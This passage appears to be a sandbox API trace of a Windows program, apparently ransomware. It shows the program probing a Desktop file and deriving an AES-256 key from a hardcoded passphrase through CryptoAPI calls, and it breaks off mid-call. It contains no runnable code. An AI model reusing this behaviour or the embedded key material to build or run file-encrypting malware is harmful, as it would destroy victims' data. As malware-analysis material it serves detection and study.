0x43c9c38 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0123.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0123.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e78 [0123.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9e78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0123.762] CloseHandle (hObject=0x2a0) returned 1 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0123.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0123.763] FreeLibrary (hLibModule=0x772d0000) returned 1 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0123.763] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0123.763] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359860 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0123.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e78 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0123.764] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0123.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0123.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0123.813] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0123.814] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kLTeW7.mp3", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41629130, ftCreationTime.dwHighDateTime=0x1d5ebbe, ftLastAccessTime.dwLowDateTime=0xcb05e920, ftLastAccessTime.dwHighDateTime=0x1d5eb9e, ftLastWriteTime.dwLowDateTime=0xcb05e920, ftLastWriteTime.dwHighDateTime=0x1d5eb9e, nFileSizeHigh=0x0, nFileSizeLow=0x18980, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="kLTeW7.mp3", cAlternateFileName="")) returned 0x41ac280 [0123.814] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0123.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0123.815] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0123.815] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0123.815] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0123.815] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0123.815] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0123.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0123.816] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0123.816] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0123.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0123.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0123.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0123.860] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0123.860] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0123.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0123.860] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0123.860] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0123.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0123.860] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.861] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0123.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca790, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0123.861] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0123.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0123.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0123.861] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0123.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0123.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0123.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0123.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0123.861] CryptHashData (hHash=0x41ac640, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0123.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.861] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0123.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0123.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa48, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0123.862] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac100) returned 1 [0123.862] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.862] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", 